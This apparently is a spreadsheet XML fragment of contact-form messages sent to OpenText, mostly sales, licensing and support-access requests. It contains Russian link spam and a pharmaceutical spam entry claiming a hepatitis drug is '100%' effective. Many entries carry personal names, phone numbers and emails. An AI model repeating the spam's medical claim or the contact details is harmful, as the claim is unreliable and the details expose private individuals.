    <t>I have a lead on an end user in Northern ID with an initiative to implement an InfoArchive solution.  I have previously been working with members of the Flatirons &amp; OpenText team - Melinda Hackstaff was my contact.  I believe she is gone.  Please have someone contact me to talk next steps.  Thanks.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I work with UTC employees to register and make payment on their behalf to attend trainings/meetings/courses.  We are working on our end of the year wrap up and our finance department does not show a W-9 on file for OpenText.  Would you please email that information over to me at your earliest convenience?</t>
  </si>
  <si>
    <t>I need to download Brava editing software. _x000D_
_x000D_
Matt:_x000D_
Software PIN:     IGC457639_x000D_
Product Description:     Brava! Desktop TIFF, PDF, JPG, EPS/PS &amp; CSF only. All featur_x000D_
Product Version:     16.2_x000D_
Software ID:     FEAA1701B34E4161B1E5734E22299090_x000D_
_x000D_
Thank you,_x000D_
Matt</t>
  </si>
  <si>
    <t xml:space="preserve">By way of introduction, my name is Emily, and I am a business development specialist at Vistaprint Corporate. I am taking an educated stab in the dark here, however based on your company profile you appear to be a fit for our Vistaprint Corporate online print portal. _x000D_
_x000D_
Our print portal is designed for companies of a certain size that purchase print materials (business cards, letterhead, postcards, signage and more) frequently throughout the year. We offer competitive pricing and free standard shipping on all orders. You can view our products and pricing here: http://vistaprintcorporate.com/pricelist/ We can also place discounted orders for any promotional items you may need!_x000D_
_x000D_
I would love to jump on the phone with you to ask you a few questions and make sure your company qualifies. _x000D_
_x000D_
Please see my availability (EST) at www.calendly.com/erodman and schedule a time that works best for us to connect. You may contact me at (781) 323-8323 or respond directly to this email if you have any questions. _x000D_
_x000D_
I look forward to hearing from you!_x000D_
_x000D_
Best, _x000D_
Emily Rodman_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Arcadis is looking for an ECM solution to support our Oracle Cloud ERP go live.   Please have someone contact me for inclusion on RFI. </t>
  </si>
  <si>
    <t>try to register with site for support, but unable to reset password. thanks</t>
  </si>
  <si>
    <t>Password rest fails. Password entered are the same</t>
  </si>
  <si>
    <t>Bonsoir Madame, Monsieur,_x000D_
Nous utilisons une version InputAccel / Dispatcher relativement ancienne : version 5.3.300_x000D_
Nous avons fait une intervention matérielle sur notre serveur et la solution a basculé en mode démo._x000D_
Quelle est la solution pour débloquer cette situation ?_x000D_
Merci pour votre aide._x000D_
Cordialement,_x000D_
Christian DELAS_x000D_
c.delas@cogeser-ds.com_x000D_
06 69 68 07 09</t>
  </si>
  <si>
    <t xml:space="preserve">If we purchase the 10 seat license, does it expire after 1 year? Are you required to purchase upgrades each year to maintain the working program? </t>
  </si>
  <si>
    <t>Unable to Access the Support portal even after verification</t>
  </si>
  <si>
    <t>Hi._x000D_
_x000D_
I work in the Digital Banking (online and mobile banking) division of Fiserv.  Fiserv are a Fortune 500 company.  _x000D_
_x000D_
We are evaluating 3rd party content management systems that we can collaborate with or oem in to our digital banking platform.  _x000D_
_x000D_
Our selection process is very compressed so a CMS vendors' ability to respond and work quickly is paramount._x000D_
_x000D_
Look forward to hearing from you on my mobile (+44 7712 677 434) to discuss if/how we can work together._x000D_
_x000D_
Regards_x000D_
Alan</t>
  </si>
  <si>
    <t xml:space="preserve">After clicking password reset email...._x000D_
Reset password error message: Update Password Failed </t>
  </si>
  <si>
    <t>I would like a list of training (web and class room) for Documentum D2, Webtop and xCP developers. That is, technical training for Java developers, to enable building systems using the Documentum products (for documentation and case management). The link provided for training on this page does not work.</t>
  </si>
  <si>
    <t>Объем инвестиций в проект в госкорпорации оценили в 20 млн (более 1,3 млрд маркировки товара в промышленных условиях применяют сент. После того как покупатель зарегистрировался и оформил заказ, менеджер магазина получает от него с сайта письмо с заявкой. Ленточный принтер для маркировки и не только! Хотел приобрести их как универсальный инструмент для сборки шкафов управления. Термостойкие провода применяют там, где другие кабели и провода не выдерживают высоких термостойкий: купить по низким ценам в интернет наличии в продаже высокотемпературные провода: кембрик термостойкий , кабель термостойкий и т.  _x000D_
Защита и фиксаторы Арматура для бачка уклад - Инструкция по установке арматуры для сливного бачка унитаза. Маркировка трубопроводов - Производство наклеек и стрелок. Как поставить перемычку или что-нибудь с ним сделать? Название русское: Гайки шестигранные высокие класса точности А. Статьи и обзоры Принтериспользуетсядляпромышленной цветной маркировки кабеля, провода, оптического кабеля, сети, силовых кабелей, жил кабеля, электропроводов, жгутов, контрольных кабелей, коаксиальных кабелей, упаковки, продукции, инструмента, инвентаря, шкафов, щитов, металлов.  _x000D_
[url=http://www.menacapital.com.lb/content/%D0%B1%D0%BB%D0%BE%D0%BA%D0%B8%D1%80%D0%B0%D1%82%D0%BE%D1%80%D1%8B-%D0%B4%D0%BB%D1%8F-%D1%82%D1%80%D1%83%D0%B1%D0%BE%D0%BF%D1%80%D0%BE%D0%B2%D0%BE%D0%B4%D0%BD%D0%BE%D0%B9-%D0%B0%D1%80%D0%BC%D0%B0%D1%82%D1%83%D1%80%D1%8B-%D0%B0-%D1%82%D0%B0%D0%BA%D0%B6%D0%B5-tramel-ps77-%D1%86%D0%B5%D0%BD%D0%B0]маркер самоламинирующийся самолам brady b 427 для маркировки провода цена[/url] _x000D_
[url=https://www.acetutors.com.sg/forum/member.php?159639-Karmaliusmak]weicon va 1500[/url] _x000D_
[url=http://www.titangate.com/contact.php?name=KarmaliusUnath&amp;email=carsconti-chivg%40draviero.pw&amp;topic=%D0%BC%D0%B0%D1%80%D0%BA%D0%B5%D1%80%D1%8B+%D1%81%D0%B0%D0%BC%D0%BE%D0%BB%D0%B0%D0%BC%D0%B8%D0%BD%D0%B8%D1%80%D1%83%D1%8E%D1%89%D0%B8%D0%B5%D1%81%D1%8F+%D0%B8%D0%BB%D0%B8+kf9045&amp;question=&lt;a+href%3Dhttps</t>
  </si>
  <si>
    <t>Account FINISH LINE INC. (123178990237)_x000D_
_x000D_
Please reset the password for user CS1993MA</t>
  </si>
  <si>
    <t>Submitting an RFP to market this week - need a contact email.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
_x000D_
We would like to request the prices for the renewal for Servihabitat Servicios InmobiliariosSLU - EU0038586_x000D_
The details are these:_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
I know you have sent to the customer a quote, but the customer has do all their purchases and renewals through partner, in this case is us. _x000D_
Do you have any kind of discount for partners?_x000D_
Muchas gracias_x000D_
Saludos_x000D_
Vanessa Estefania Gonzalez_x000D_
INSIDE SALES_x000D_
____________________________________________________x000D_
COMPAREX ESPAÑA_x000D_
Software, Solutions and Services department_x000D_
phone:	+34 91 598 1406_x000D_
fax:	+34 91 662 9756_x000D_
mobile:	+34 615 84 80 47_x000D_
email:	vanessa.gonzalez@comparex.es_x000D_
web:	www.comparex.es_x000D_
</t>
  </si>
  <si>
    <t>I am looking for a solution for Correspondence Management system in CS 16. Do you have any sub system or any features in CS 16, Please let me know._x000D_
Regards,_x000D_
Sandeepta</t>
  </si>
  <si>
    <t xml:space="preserve">Please could some get a message to Barb Dorfman to contact me please, it's regarding a delivery that arrived on my desk last Friday morning. Thanks </t>
  </si>
  <si>
    <t xml:space="preserve">Our Exceed 10 licens is stille active. But My collegue John Munkholm (joman@tdc.dk) is not working in TDC any longer._x000D_
I am not able to install exceed 10 after upgrading to Windows 7 Enterprise 64 bit version..._x000D_
Can you provide any help here._x000D_
Only need to get it to Work for one year or so, because we are taking our ATM Network Down._x000D_
Best regards_x000D_
Lars D Johansen_x000D_
TDC A/S_x000D_
</t>
  </si>
  <si>
    <t>I have detailed POC Report about this issue. So please send me your security section's contact email.</t>
  </si>
  <si>
    <t xml:space="preserve">Request for quote#093186-17-EXO_x000D_
Hello, dear sirs_x000D_
We have a customer interested in the following:_x000D_
Product name: Brava _x000D_
Quantity 10_x000D_
_x000D_
Would you please provide me with the terms of purchase? _x000D_
What are the terms of payment (wire transfer/credit card), delivery and reseller discount?_x000D_
Please inform me if the suggested retail price is fixed._x000D_
What is the correct name of product._x000D_
Please let me know if you have any questions._x000D_
Looking forward to your feedback._x000D_
_x000D_
Best regards,_x000D_
Yana Cherepivskaya_x000D_
Logistics Manager_x000D_
Т +7 (495) 232 00 23 ext. 6152 |  Yana.Cherepivskaya@softlinegroup.com_x000D_
Softline Group Company | Varshavskoye shosse, bld 42/1, office 6254, Moscow, Russia, 115230_x000D_
www.softlinegroup.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Looking for outsourcing to upgrade existing livelink environment</t>
  </si>
  <si>
    <t>Regarding: Information about eDOCS and Documentum._x000D_
Dear Sir / Madam,_x000D_
_x000D_
For a client of mine, I am looking for information about two applications, eDOCS and Documentum._x000D_
I have a question whether the following functionality is offered in both applications:_x000D_
_x000D_
1. Document composition: does the DMS have a template / template tool?_x000D_
2. Create: create a new file via an Office-application, or; receiving and subsequently storing a document which is received by mail, or; scanning a physical document to a file, etc._x000D_
3. Searching and finding: looking up one or more files, filtering the retrieved information and using the final search result. Can both applications also search outside of its own DMS and search "over" applications?_x000D_
4. Metadata: a document must be enriched with metadata during several steps in the process._x000D_
5. Version management: during storage, the editor can choose to save the document under the same version or to create a new version of it._x000D_
6. Classify: A confidentiality level can be linked to the document._x000D_
7. Collaboration: the creation of a file by one or more persons, via an internal platform that allows the sharing of files between two or more parties, as well as working together on a document or routing files for review. I also wondered whether a link with Sharepoint is possible? And whether cooperation in a chain with external parties is possible as well?_x000D_
8. Signing: After drawing up a file, documents can be offered for approval by one or more employees._x000D_
9. Inform: after approval of documents, applicants or other involved parties must be informed about the outcome of a process._x000D_
10. Publish: publication of documents at a location where everyone can view/open the documents._x000D_
11. Sustainable storage: transfer files to archive. Convert and provide metadata, with a storage period._x000D_
12. Destroy: after the expiry of the retention period, the archive records concerned are destroyed. This happens automatically, where possible, with the help of pre-assign</t>
  </si>
  <si>
    <t>vendors database</t>
  </si>
  <si>
    <t xml:space="preserve">UCB is a leading first generation bank in Bangladesh with over 170 branches located all over Bangladesh. Recently UCB expressed its desire to implement an Enterprise Content Management System (ECMS) and conducted a rigorous process for procurement of the same. During this process, UCB was approached by Crypto Limited, a Bangladeshi Company, providing their willingness to provide Opentext as their proposed solution. In due course, it has been learnt that Crypto Limited (the local Bangladeshi agent) has set forth an Agreement with Intellicon Systems which also has provided us a document specifying that Intellicon Systems has been Authorised by Opentext to Resell, Distribute, Implement &amp; Provide Support for Opentext’s ECMS to UCB._x000D_
_x000D_
In this regard, UCB now requests Opentext to provide the following at the earliest:_x000D_
_x000D_
1.	No Objection Certificate/Letter stating Opentext has given full authorization to Intellicon Systems for Resell, Distribute, Implement &amp; Provide after sales Support of Opentext’s ECMS to UCB_x000D_
2.	No Objection Certificate/Letter stating that Intellicon Systems has been given full authorization/Power of Attorney to go into a legal agreement  with UCB &amp; Crypto for Resell, Distribute, Implement &amp; Provide after sales Support of Opentext’s ECMS to UCB and represent Opentext for any part thereof_x000D_
_x000D_
Your reply at the earliest is appreciated._x000D_
</t>
  </si>
  <si>
    <t>I just purchased helix7 ice g2 didn’t receive an instructional manual after spending that amount of money and don’t get a manual for it very disappointing:( I have always bought Lowrancein in the past first purchase of hummingbird probably my last Please send a manual</t>
  </si>
  <si>
    <t>Please provide me a telemarketing script for cold calls._x000D_
_x000D_
Thank you,_x000D_
Rana</t>
  </si>
  <si>
    <t>Really sorry for the inconvenience and improper use of this service, but I've been trying to find whether or not OpenText offers any year-long internships for undergraduates (ideally in Canada)? If so, is there a formal process you could guide me toward?_x000D_
Thanks,_x000D_
Jake</t>
  </si>
  <si>
    <t>Вип клиники москвы Рязанский центр стоматологической имплантации. Высококвалифицированные специалисты Рязанского центра стоматологической имплантации осуществляют на высочайшем уровне любые стоматологические услуги по [url=http://dentaljazz.ru/services/detskaya-stomatologiya/]зубная детская стоматология[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Новейщие прапараты для лчения гепатита с. Эфективность курса 100%. Доставка по всем городам россии и снг. _x000D_
 _x000D_
[url=http://gepatitunet71.ru]hepcinat lp сколько стоит в индии[/url]_x000D_
[url=http://gepatitunet71.ru]воронеж купить гепцинат лп[/url]_x000D_
 _x000D_
&lt;a href=http://gepatitunet71.ru&gt;лекарства для лечения цирроза печени&lt;/a&gt;_x000D_
&lt;a href=http://gepatitunet71.ru&gt;лекарство софосбувир цена где купить&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>Wanted to apply for this position at OpenText except:_x000D_
https://jobs.utah.gov/jsp/utjobs/single-job?j=3688012_x000D_
_x000D_
About 8 years ago interviewed at a similar position with a head manager, others couldn't make the interview which has often happened to me, Friday afternoon, useful number in an HR quota cattle call.  Manager copped that I was likely being discriminated against for South Jordan Draper positions for being non-Mormon.  OpenText he admitted was a similar "open-ly" Mormon exclusionary environment._x000D_
_x000D_
Religion, cultural, ideology, techno-narcissism is a scourge for humanity.</t>
  </si>
  <si>
    <t>_x000D_
Dear Sir/Madam:_x000D_
_x000D_
If you don’t mind do you have or know a good source of (communication) technology or software or application or tool for research to collect data from online/internet/web to a destination database where the data will be searched?_x000D_
_x000D_
Thank you and I look forward to your response or reply._x000D_
_x000D_
 _x000D_
_x000D_
Sincerely.</t>
  </si>
  <si>
    <t>I am proposing that you setup an office in Ghana. I can please manage it on your behalf._x000D_
_x000D_
This is coming as a result of high rise of technology use in Ghana and countries on it boarders ._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I am an architect on the OT CEM team_x000D_
_x000D_
Website it broken. I used to (tried perhaps a week ago) be able to link to documents for a CEM suite product. I usually get redirected to login when linking to a products docs, then I login and get to the correct place._x000D_
_x000D_
Now I login, but do not get directed to the correct place. I see a link to original docs, click that, then have to log in again, and this cycles.</t>
  </si>
  <si>
    <t>How can I obtain a trial version of OpenText Gupta Report Builder?</t>
  </si>
  <si>
    <t>Good time of day._x000D_
We have now some projects with its source codes developed on Centura Team Developer 2000. All of these projects are working so far and need further development. So we want to buy last version of Team Developer. Can you recommend local dealer/representative/reseler in Russia?</t>
  </si>
  <si>
    <t>Need info/URLs in scope for bug bounty program</t>
  </si>
  <si>
    <t>Приветствую! класный у вас сайт! _x000D_
Нашел интересную базу кино:  [url=http://kinoserialtv.net/]Лучшие приключения[/url] _x000D_
Здесь: http://kinoserialtv.net/drama/1590-porochnaya-strast-arbitrazh-arbitrage-2012.html [b] Смотреть Порочная страсть (Арбитраж) / Arbitrage (2012) онлайн бесплатно [/b] _x000D_
Тут: [url=http://kinoserialtv.net/news/11746-ochen-strannye-dela-prodleny-na-vtoroy-sezon.html] "Очень странные дела" продлены на второй сезон [/url] _x000D_
Здесь: http://kinoserialtv.net/news/10969-emili-blant-stanet-meri-poppins-a-emma-stoun-vragom-dalmatincev.html _x000D_
http://kinoserialtv.net/uzhasy/ [b] Лучшие ужасы 2017 список [/b] _x000D_
[url=http://kinoserialtv.net/dokumentalnyy/] Лучшие документальные фильмы [/url] _x000D_
[url=http://kinoserialtv.net/uzhasy/] 2017 в хорошем качестве hd лучшие ужасы [/url] 2017 в хорошем качестве hd лучшие ужасы</t>
  </si>
  <si>
    <t>Thanks for the heads up I love you so much baby</t>
  </si>
  <si>
    <t>Thanks again</t>
  </si>
  <si>
    <t xml:space="preserve">As mentioned in previous correspondence, the 34th International Symposium on Child Abuse is scheduled for March 19-22, 2018 in Huntsville, AL at the Von Braun Center. We are pleased to announce our Opening Plenary Keynote Address presenter, Arkansas's First Lady Susan Hutchinson and Opening Plenary Remarks presenter, U.S. Associate Attorney General Rachel Brand.  Their introductions can be found in the Keynote Speakers section on our Symposium website._x000D_
Exhibitor and advertiser rates have not increased and response to our call for exhibitors and advertisers has been very promising. In fact, as of this writing more than twenty organizations have registered for exhibit space and all three of the Exhibitor Showcase Workshops are reserved. A listing of those currently registered is available on the Exhibiting/Advertising section of our Symposium website. _x000D_
_x000D_
If you are debating about whether or not you should exhibit and/or advertise at the 34th International Symposium on Child Abuse, we suggest you visit our Exhibiting and Advertising Guide to see what past exhibitors and advertisers have said.  In addition to the demographics of our attendees, the guide illustrates what they buy, where they are from, their intention to return, and the acceptance and utilization of the Symposium Conference app designed to benefit the attendees, exhibitors, and advertisers. The Exhibitor and Advertising Registration process is open. We are excited about the possibility of perhaps expanding our exhibit hall this year!  _x000D_
_x000D_
We must reserve exhibitor space early in the new year. With the holidays coming up in a matter of weeks, if you haven’t registered yet and wish to do so, we encourage you to register as soon as possible. Register today!_x000D_
</t>
  </si>
  <si>
    <t>We currently use AppXtender 8.1 from EMC/OpenText (with 55 licenses), and have an inventory of approximately 3,000,000 scanned images/pages, primarily realty and legal-related.  We would like a vendor -- or nearby OpentText client -- demonstration of what our basic AX scanning and retrieval document system would look like with 1) a more complete set of documents beyond images (e.g.: DOC, XLS, PDF, etc.), and 2) an added layer of actual Content Management, with managed workflows, communications, input/output, and archival/retention in place.  In addition, a ball-park estimate of the effort and cost to implement such an enhanced ECM, would be much appreciated._x000D_
_x000D_
Is this something you could provide for us, or know of someone who could?  If so, please contact me at: glhouck@bpa.gov or 360-619-6720.  Thank you, Geoff Houck.</t>
  </si>
  <si>
    <t>Looking for a price quote for 15 licenses. Thank you.</t>
  </si>
  <si>
    <t>Evaluating your solution for an enterprise ECM project.</t>
  </si>
  <si>
    <t xml:space="preserve">To Whom it May Concern,_x000D_
_x000D_
Emerus Management Company is looking for services in conjunction with a future Epic implementation.  We were provided your contact information by our Epic project coordinator to assist us with additional information on products and pricing.  We would like to connect as soon as possible to speak with you about these services and get quotes in place._x000D_
_x000D_
Please let us know if you are the appropriate person or if you can direct us to the best person to speak with for more information.  Any assistance is greatly appreciated!_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Gia Calvillo_x000D_
Director, IT Operations and Services_x000D_
 _x000D_
8686 New Trails Dr. Suite 100 The Woodlands, TX 77381_x000D_
Main: (281) 292-2450 | Direct: (713) 637-1122_x000D_
www.emerus.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Geoffrey F. Cook_x000D_
757 Resort Drive_x000D_
Livingston, TX 77351_x000D_
(936) 433-7471(Home)_x000D_
mr_geoffrey_cook@hotmail.com_x000D_
 _x000D_
 Objective: I am seeking a job in software testing or product development._x000D_
 _x000D_
Education_x000D_
_x000D_
University of Houston , B. S., Engineering Technology,1993_x000D_
Southwest Texas State University, B. S. , Computer Science, 1981_x000D_
_x000D_
_x000D_
Professional Skills_x000D_
_x000D_
_x000D_
High Level Languages: Basic , Fortran ,C ,Clipper , Pascal ,C++ _x000D_
Assembly Languages: Intel(386) ,Motorola(68000)_x000D_
Operating Systems: Dos, Unix, NT, XP, Windows_x000D_
_x000D_
Employment History_x000D_
_x000D_
Software Tester                               M.I. Systems _x000D_
_x000D_
Tested Y2K for a financial application on an AS/400. _x000D_
_x000D_
_x000D_
Software Tester                               Kinesix Corp. _x000D_
_x000D_
Tested a real-time, computer graphic interface used in critical _x000D_
applications. Environments were SGI, IBM, Sun, DEC, HP, and NT/Intel. _x000D_
_x000D_
Software Tester                               Cimarron Software Services _x000D_
_x000D_
Tested Command software, in a client server environment, which was used in the Space Program. The work was based on the team concept. Duties included: creating procedures to ensure that technical objectives were met, supporting test activities, and reporting, documenting, and analyzing problems. Testing also involved performing tasks in new and novel ways to find possible problems. The project was the Space Station._x000D_
_x000D_
Programmer/Analyst                       Westren Equipment Company _x000D_
_x000D_
Analyzed situations relating to the technical and business aspects of Westren Equipment's operations and product, a parallel processing, image generation device. Proposed ideas for the improved performance and attractiveness of the product. Identified and satisfied information needs relating to business practices and the product. Developed software using 68000 assembly language related to the product. Developed and maintained code in Clipper, Basic, and C associated with the development cycle. Documented software and proofed hardware diagrams._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Interest in rightfax</t>
  </si>
  <si>
    <t>I need the link to download the Brava Reader.  I have used your online form twice and didn't receive an email with the link.  Thank you.</t>
  </si>
  <si>
    <t>Looking to Migrate our On-Prem RightFAX solution to a Cloud-Based solution.</t>
  </si>
  <si>
    <t>Seeking partner / alliance access to knowledge center._x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t>I require access to knowledge.opentext.com (Ernst &amp; Young has an Alliance with OpenText).</t>
  </si>
  <si>
    <t>I used Hummingbird DM in the past and my new employer is interested in a DM program.  Can I get pricing information?  We are currently a 12-person law firm with expected growth in the near future and operate on the cloud.  We are in the process of going "paper light" and operate almost exclusively electronically.  We would like to get an estimate of cost in order to prepare next year's budget.  Thank you, Lisa</t>
  </si>
  <si>
    <t xml:space="preserve">I need to establish an account with Optinext.com for our Teleform Maintenance agreement and need the most current version of the software._x000D_
We need to establish/purchase a maintenance contract for the following Teleform Desktop Serial Numbers:_x000D_
#807038 and #807039._x000D_
</t>
  </si>
  <si>
    <t>We are looking for a fax to mail solution for instances where we receive faxes.</t>
  </si>
  <si>
    <t>Epoca (Commid: 12/7323905808 Inovis) currently trades EDI 875 PO with Publix (Commid 08/089262390000).  Several years ago, form submitted for carbon copy set up to have 875 also go to CDZ Salesm 12/7277856264 Van EasyLink/AT&amp;T.  Please confirm if this is in place or not.  Thank you very much._x000D_
_x000D_
Monica Quan_x000D_
Epoca International, Inc._x000D_
monica.quan@epoca.com</t>
  </si>
  <si>
    <t>Bonjour_x000D_
_x000D_
Nous menons actuellement une étude DLP et DRM pour un client grand compte. J'aimerais être mis en contact avec un représentant de votre société afin de répondre à des questions sur votre solution DRM et éventuellement avoir une démo webex de votre solution. Je peux vous fournir par mail un document contenant les besoins de notre client ainsi que les premières questions que nous avons déja sur DRM._x000D_
_x000D_
Merci de votre retour_x000D_
_x000D_
Cordialement_x000D_
_x000D_
Marc Schoonheere_x000D_
NES</t>
  </si>
  <si>
    <t xml:space="preserve">Questions about our support contract, please call 513-263-9296 or email today </t>
  </si>
  <si>
    <t>Have a need for a 5 member team to be able to send and receive faxes from their laptops and have incoming faxes reside in a common storage area so all can access.</t>
  </si>
  <si>
    <t>I need to study diploma Security management  (distance).may I have pamphlets also price.thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
I know that you are our Partner in US for all Catia Licenses. I check your website for searching for CATIA V5 training`s. I can not found anything. Did you our partner for training's as well? If yes please forward me an overview for all available classroom Trainings for Catia V5._x000D_
Thanks in advance and _x000D_
regards_x000D_
_x000D_
Daniel Poettgen </t>
  </si>
  <si>
    <t>Job Application_x000D_
Earlier this week I submitted an application for the following advertised opening:_x000D_
Manager, Workplace Security &amp; Safety EMEA_x000D_
_x000D_
I haven't received any acknowledgement that the application was received.  Could you please pass this to your Careers / HR department to check that it was received by them and ask them to let me know._x000D_
_x000D_
Thank you_x000D_
_x000D_
Arthur Rabjohn</t>
  </si>
  <si>
    <t>Hi, I believe we are already an OpenText customer. I would like to understand what accreditation / certification the product has achieved (for audit, security, data classification etc), so that we can understand what scenarios we can use our existing OpenText platform for.  Email response would be preferred initially, Many thanks.</t>
  </si>
  <si>
    <t>We have a potential lead for ECM. Can we partner on the project?</t>
  </si>
  <si>
    <t xml:space="preserve">ご担当者様_x000D_
 _x000D_
いつもお世話になっております。_x000D_
株式会社クロスエッジの水野真実と申します。_x000D_
 _x000D_
当社は、「レスポンスを出す」広告に特化した広告代理店です。_x000D_
テレビをはじめとしたマスメディアやWEBや動画を使ったプロモーションで効果を出すことを非常に得意としております。_x000D_
 _x000D_
この度、ご連絡をさせて頂いたのは、_x000D_
ランキングサイトを用いて高い成約率を実現する集客サービスのご紹介のためです。_x000D_
 _x000D_
ランキングサイトは、_x000D_
・第三者目線で（広告ではなく）_x000D_
・商品の特徴を明らかにし順位付けしながらオススメすることで_x000D_
・自社商品などの優位性を示し、高い成約率を誇るという特徴があります。_x000D_
 _x000D_
当社ではこれまで300社以上のランキングサイトを制作し、_x000D_
その90%以上が効果的な成果を生み出しており、_x000D_
ランキングサイトの制作・運用に自信を持っています。_x000D_
 _x000D_
また、これまでのノウハウやお客様の声から月額も不透明な固定費制を廃止し、_x000D_
ご納得頂ける形でのランニングコストとなっております。_x000D_
 _x000D_
さらに、今なら毎月3社様に限り、_x000D_
ランキングサイト制作の初期費用を初回特別価格と致しまして、_x000D_
20万円にてやらせて頂きます。_x000D_
この価格は通常50万円にてやらせて頂いており、業界最安値かと存じます。_x000D_
 _x000D_
【当社にご依頼頂く企業様の声】_x000D_
・既存のチャネルだけでは成果が少なく困っていましたが、効果的な新しい集客方法で満足している。_x000D_
・顧客獲得単価が、紙媒体やリスティング広告、その他施策よりも安くて驚いている。_x000D_
・クロスエッジの運用ノウハウもあり、驚くほど、問い合わせ数が増えた。_x000D_
・動画広告やCVRなどの施策の提案もあり、商材にあった提案をして頂けた。_x000D_
突然のご連絡で大変恐縮なのですが、_x000D_
もし、多少なりともご興味頂ける部分がございましたら_x000D_
より詳しいお話しをさせて頂く機会を頂けましたら幸甚でございます。_x000D_
 _x000D_
大変貴重なお時間を頂く形となり大変恐縮ではございますが、_x000D_
以下の候補日にて、ご都合は如何でしょうか。_x000D_
 _x000D_
 _x000D_
【日程候補】_x000D_
■12/20(水)10：00～17：00の間_x000D_
■12/21(木)10：00～17：00の間_x000D_
■12/22(金)10：00～17：00の間_x000D_
_x000D_
_x000D_
当方からの日程提示となり、誠に恐縮ではございますが、ご確認頂けますと幸いにございます。_x000D_
 _x000D_
もし、上記日程が難しい様であれば何なりと仰って下さいませ。_x000D_
 _x000D_
また、ご不明点等ありましたら、下記のメールアドレスにご返信頂ければ幸いでございます。_x000D_
それでは、略儀ではございますが、書中にて失礼させて頂きます。_x000D_
 _x000D_
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝_x000D_
株式会社 クロスエッジ_x000D_
〒141-0031_x000D_
東京都品川区西五反田1-11-1_x000D_
営業部　水野　真実_x000D_
&lt;TEL&gt;03-6417-3040/&lt;FAX&gt;03-6417-3041_x000D_
&lt;mail&gt;mizuno@x-edge.jp_x000D_
&lt;URL&gt;http://x-edge.jp/_x000D_
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Приветствую! класный у вас сайт! _x000D_
Зацените, нашёл супер базу кино онлайн в хорошем качестве: [b] 2017 смотреть лучшие мультфильмы [/b] [url=http://inspacefilm.ru/]http://inspacefilm.ru/[/url] _x000D_
http://inspacefilm.ru/luchshaya-fantastika-spisok-filmov/ [b] Лучшие фантастика 2017 в хорошем качестве hd [/b] _x000D_
[url=http://inspacefilm.ru/detektiv/] 2017 в хорошем качестве лучшие детективы [/url] _x000D_
[url=http://inspacefilm.ru/multfilmy/] 2017 в хорошем качестве лучшие мультфильмы [/url] 2017 в хорошем качестве лучшие мультфильмы _x000D_
http://inspacefilm.ru/newskino/10604-silvestr-stallone-sobiralsya-boykotirovat-oskar.html [b] Сильвестр Сталлоне собирался бойкотировать «Оскар» [/b] _x000D_
[url=http://inspacefilm.ru/newskino/9002-zvezdnye-voyny-epizod-s-benisio-del-toro.html] Звёздные войны: Эпизод с Бенисио дель Торо [/url] _x000D_
и Тут: http://inspacefilm.ru/multfilmy/12859-malenkiy-princ-le-petit-prince-sezon-1-3-2010-2017.html</t>
  </si>
  <si>
    <t xml:space="preserve">Job applying </t>
  </si>
  <si>
    <t>I am a documentum consultant and want to access the documentum forums/community support</t>
  </si>
  <si>
    <t>Всем привет! класный у вас сайт! _x000D_
Нашел интересную базу кино: [b] Лучшая фантастика рейтинг [/b] [url=http://kinofly.net/]http://kinofly.net/[/url] _x000D_
Здесь: http://kinofly.net/news/10762-v-kieve-pokazhut-film-koncert-duran-duran-ot-devida-lincha.html [b] В Киеве покажут фильм-концерт Duran Duran от Дэвида Линча [/b] _x000D_
Тут: [url=http://kinofly.net/komediya/7134-mangaka-i-ego-assistentka-mangaka-san-to-assistant-san-to-2014.html] Смотреть Мангака и его ассистентка / Mangaka-san to Assistant-san to (2014) онлайн бесплатно [/url] _x000D_
Тут: http://kinofly.net/detektiv/11812-advokat-dyavola-the-devils-advocate-1997.html _x000D_
Здесь: http://kinofly.net/komediya/ [b] 2017 онлайн лучшие комедии [/b] _x000D_
Здесь: [url=http://kinofly.net/fantastika/] 2017 смотреть лучшие фантастика [/url] _x000D_
Тут: [url=http://kinofly.net/fantastika/] Лучшие фантастика новинки в хорошем качестве hd [/url] Лучшие фантастика новинки в хорошем качестве hd</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to discuss the excessive CPU usage of program ENGEXE that generates statements for BNYMellon.  </t>
  </si>
  <si>
    <t>Tracking duplicate element</t>
  </si>
  <si>
    <t>Invitation to our RFI (Request for Info) / RFP process in our search for a new ECM solution.</t>
  </si>
  <si>
    <t>Question about tracking duplicate element</t>
  </si>
  <si>
    <t>Привет всем участникам! класный у вас сайт! _x000D_
Нашел интересную базу кино:  [b] лучшие мультфильмы 2017 список [/b] [url=http://kinoklan.net/]http://kinoklan.net/[/url] _x000D_
Здесь: http://kinoklan.net/otechestvennyy/1334-korona-rossiyskoy-imperii-ili-snova-neulovimye-1970.html [b] Смотреть Корона Российской империи, или Снова неуловимые (1970) онлайн бесплатно [/b] _x000D_
Здесь: [url=http://kinoklan.net/news/11842-amazon-zakazal-proizvodstvo-antologii-uzhasov-lore.html] Amazon заказал производство антологии ужасов "Lore" [/url] _x000D_
Здесь: http://kinoklan.net/news/9653-kinoteatr-multipleks-pereezzhaet-iz-blokbastera.html _x000D_
http://kinoklan.net/uzhasy/ [b] 2017 список лучшие ужасы [/b] _x000D_
[url=http://kinoklan.net/fantastika/] лучшаЯ фантастика 2017 список [/url] _x000D_
[url=http://kinoklan.net/multfilmy/] 2017 список лучшие мультфильмы [/url] 2017 список лучшие мультфильмы</t>
  </si>
  <si>
